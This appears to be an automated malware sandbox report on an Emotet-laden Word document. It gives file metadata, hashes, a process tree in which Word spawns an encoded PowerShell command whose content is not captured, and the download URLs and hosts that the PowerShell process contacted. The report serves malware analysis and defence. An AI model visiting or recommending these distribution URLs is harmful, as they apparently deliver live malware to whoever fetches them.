Field | Value
---|---
File name | 20190918 5663473.doc
Full analysis | https://app.any.run/tasks/985fa465-a544-4973-91c7-e55248a0d5f0
Verdict | Malicious activity
Threats | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.
Analysis date | October 14, 2019, 13:00:52
OS | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags | —
MIME | application/msword
File info | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: grow Jewelery payment, Subject: front-end, Author: Abbigail Doyle, Comments: channels, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Sep 18 15:38:00 2019, Last Saved Time/Date: Wed Sep 18 15:38:00 2019, Number of Pages: 1, Number of Words: 95, Number of Characters: 547, Security: 0
MD5 | 2DDD7A9AA53C0E243BA81E897A3CDAAB
SHA1 | FF41649E2DD3083DE76519E372A654F49454389B
SHA256 | D05CCB541D988789BBEE894553D74418F0531FD2FC685F0D96367A0230DA197C
SSDEEP | 6144:TRyxNRIIt1POT3XtwNJ6mdtPLkIZ7NSU4jJntATfD9GPy4XSKD:TRyxNRIIt1POT3XtwNJ6mdtXZ7NSU4Vj
Extension | Detected type
---|---
.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)
Property | Value
---|---
CompObjUserType | Microsoft Word 97-2003 Document
CompObjUserTypeLen | 32
Manager | Medhurst
HeadingPairs | —
TitleOfParts | —
HyperlinksChanged | No
SharedDoc | No
LinksUpToDate | No
ScaleCrop | No
AppVersion | 16
CharCountWithSpaces | 641
Paragraphs | 1
Lines | 4
Company | Schowalter, Baumbach and Buckridge
CodePage | Windows Latin 1 (Western European)
Security | None
Characters | 547
Words | 95
Pages | 1
ModifyDate | 2019:09:18 14:38:00
CreateDate | 2019:09:18 14:38:00
TotalEditTime | —
Software | Microsoft Office Word
RevisionNumber | 1
LastModifiedBy | —
Template | Normal.dotm
Comments | channels
Keywords | —
Author | Abbigail Doyle
Subject | front-end
Title | grow Jewelery payment
PID | CMD | Path | Indicators | Parent process
---|---|---|---|---
1608 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\20190918 5663473.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe
4040 | powershell -encod [encoded command not captured in this copy of the report] | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | wmiprvse.exe

PID | User | Company | Integrity Level | Description | Exit code | Version
---|---|---|---|---|---|---
1608 | admin | Microsoft Corporation | MEDIUM | Microsoft Word | — | 14.0.6024.1000
4040 | admin | Microsoft Corporation | MEDIUM | Windows PowerShell | 0 | 6.1.7600.16385 (win7_rtm.090713-1255)
PID | Process | Filename | Type | MD5 | SHA256
---|---|---|---|---|---
1608 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRA860.tmp.cvr | — | — | —
1608 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5CD937F.wmf | wmf | FB035DDD00FF4E67418FE946AF433D8F | 43E65387BF0030BE86A051C7F3175CACB7EDE7246644EE731B366F0C100F1F8A
1608 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | D3E45E9E34C71A48C10FD945E9620BAF | 6CC7603DD408465CD9F4E0ED479443E49C34BDBCC43DE9FD1A9A1A1B8185537F
1608 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BE29F13B.wmf | wmf | D6DC75921E19E6EDF49D1A5401A13BA9 | 5CD080CA355978C64BB72E025FF9957838AAE72A6F621C2FDA558923CA486E69
1608 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\45F81ED.wmf | wmf | A763620D19A28297B3F1444F1164532A | 5E623AF25F12E061002A01B88C300C371C699FB1A84FA859FC26C2AECA370A0B
1608 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4CA7AF4C.wmf | wmf | BE149EF4A7E4875DEC9B4B8A8E52D0B0 | 1CE8F318DCD9AEE95851428924D17C982219B3BD2EB9CE0DAC1C93076BDDBF97
1608 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\AE62DA01.wmf | wmf | 46FB50CA170F2E87FFEC77D5D775C1A4 | 136F13603BC289494B5A8413AF5E1D97E7A7C71BD45A7F1D7AAB619A4DDD0E23
1608 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6D90A3A8.wmf | wmf | 01919F45764FBE382D9043FFC1338F7E | 6EA3DDC3B7200A1BA4911EB219A50AEB1A5182D599197B30AB87339FEB291D88
1608 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\629968E5.wmf | wmf | CE48C49704878C2D4274519AB0E1A2CF | 9B1F412ACB0CC7C8EE3B8267CE60A9635530AC51E526BA5EC95346555109FA22
1608 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd | tlb | BCF6251EF863CAA9BC03B97A0E613B53 | 9A289D56A0B1222FA37C5C1D0A636CBB0DA8D202598DF03782EE8E183DEAE197
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
4040 | powershell.exe | GET | — | 124.158.6.218:80 | http://thinhvuongmedia.com/wp-admin/n2keep7/ | VN | — | — | suspicious |
4040 | powershell.exe | GET | 301 | 104.28.5.162:80 | http://trunganh.xyz/wp-content/uzq50/ | US | — | — | suspicious |
4040 | powershell.exe | GET | — | 124.158.6.218:80 | http://thinhvuongmedia.com/wp-admin/n2keep7/ | VN | — | — | suspicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
4040 | powershell.exe | 124.158.6.218:80 | thinhvuongmedia.com | CMC Telecommunications Services Company | VN | suspicious |
4040 | powershell.exe | 104.28.5.162:80 | trunganh.xyz | Cloudflare Inc | US | shared |
4040 | powershell.exe | 31.210.70.130:443 | iptivicini.com | Radore Veri Merkezi Hizmetleri A.S. | TR | unknown |
4040 | powershell.exe | 104.27.132.144:443 | mnpasalubong.com | Cloudflare Inc | US | shared |
4040 | powershell.exe | 212.47.241.236:443 | www.cezaevinegonder.com | Online S.a.s. | FR | unknown |
4040 | powershell.exe | 104.28.5.162:443 | trunganh.xyz | Cloudflare Inc | US | shared |
Domain | IP | Reputation
---|---|---
thinhvuongmedia.com | 124.158.6.218 | suspicious
mnpasalubong.com | 104.27.132.144 | unknown
trunganh.xyz | 104.28.5.162 | suspicious
iptivicini.com | 31.210.70.130 | unknown
www.cezaevinegonder.com | 212.47.241.236 | unknown
PID | Process | Class | Message |
---|---|---|---|
4040 | powershell.exe | Potentially Bad Traffic | AV INFO HTTP Request to a *.xyz domain |